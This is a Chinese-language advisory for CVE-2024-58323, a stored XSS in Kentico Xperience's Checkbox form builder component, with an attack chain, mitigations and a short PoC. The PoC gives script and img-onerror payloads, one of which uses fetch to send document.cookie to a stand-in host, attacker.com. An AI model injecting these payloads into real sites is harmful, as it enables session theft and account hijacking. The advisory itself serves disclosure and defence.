CVE-2024-58323: Kentico Xperience Checkbox表单组件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2024-58323

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Kentico Xperience

漏洞概述

CVE-2024-58323是Kentico Xperience内容管理系统中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于系统的表单构建器功能中，特别是Checkbox表单组件。攻击者可以利用表单构建器的HTML支持功能，通过Checkbox组件注入恶意JavaScript脚本。当其他用户访问包含该恶意脚本的页面时，攻击代码会在用户浏览器中执行，从而窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或修改页面显示内容。由于该漏洞为存储型，恶意脚本会被永久保存在服务器端，所有访问受影响页面的用户都会受到攻击。漏洞需要低权限账户即可利用，但需要用户交互才能触发。CVSS评分5.4，属于中等严重程度。

技术细节

该漏洞的根本原因在于Kentico Xperience的表单构建器对Checkbox组件的用户输入缺乏充分的输入验证和输出编码。攻击者可以在创建或编辑Checkbox表单组件时，在标签或描述字段中嵌入恶意HTML/JavaScript代码。系统未能对用户输入进行安全过滤和转义处理，直接将未 sanitized 的内容存储在数据库中。当管理员或其他用户通过CMS查看或编辑包含该组件的页面时，嵌入的恶意脚本会被浏览器解析执行。由于是存储型XSS，攻击 payload 会持久存在于系统中，攻击者只需诱导目标用户访问相应页面即可触发攻击。攻击者可能利用此漏洞窃取会话令牌、凭据或执行其他恶意操作。Kentico官方已在hotfixes中发布了安全更新修复此问题。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标网站使用Kentico Xperience CMS，定位表单构建器功能

STEP 2

步骤2

初始访问：攻击者获取Kentico Xperience的低权限账户（如内容编辑者权限）

STEP 3

步骤3

漏洞利用：攻击者进入表单构建器，创建或编辑Checkbox表单组件

STEP 4

步骤4

Payload注入：在Checkbox组件的标签、描述或值字段中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>

STEP 5

步骤5

持久化：保存表单，恶意脚本被存储在数据库中（系统未进行输入验证和输出编码）

STEP 6

步骤6

触发阶段：诱导目标用户（如管理员）访问包含该Checkbox组件的页面

STEP 7

步骤7

脚本执行：目标用户浏览器加载页面时，恶意脚本在用户上下文中执行

STEP 8

步骤8

数据窃取：恶意脚本窃取用户Cookie、会话令牌或其他敏感信息，发送到攻击者控制的服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2024-58323 PoC - Stored XSS via Checkbox Form Component
// Target: Kentico Xperience Checkbox Form Builder

// Step 1: Login to Kentico Xperience CMS with low-privilege account
// Step 2: Navigate to Form Builder
// Step 3: Create or Edit a form with Checkbox component
// Step 4: Inject XSS payload in Checkbox label/description field:

const xssPayload = '<script>alert(document.cookie)</script>';
// or more sophisticated payload:
const advancedPayload = `
<img src=x onerror="
  fetch('https://attacker.com/steal?cookie='+encodeURIComponent(document.cookie))
">
`;

// Step 5: Save the form
// Step 6: When any user views the page containing this form component,
// the XSS payload will execute in their browser context

// Example exploitation chain:
// 1. Attacker creates form with malicious checkbox
// 2. Form is saved and stored in database (no sanitization)
// 3. Victim visits page with the checkbox form
// 4. Browser renders the checkbox component
// 5. Malicious script executes, exfiltrating session data

影响范围

Kentico Xperience < 最新安全补丁版本

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制用户对表单构建器功能的访问权限，仅允许受信任的管理员使用；2) 在Web应用层部署输入验证过滤器，对表单字段中的特殊字符（如<>、"、'、script等）进行过滤或转义；3) 启用Content Security Policy (CSP) 响应头，限制脚本执行；4) 对所有表单内容输出时进行HTML编码；5) 监控日志中的可疑XSS攻击特征；6) 考虑临时禁用表单构建器的HTML支持功能。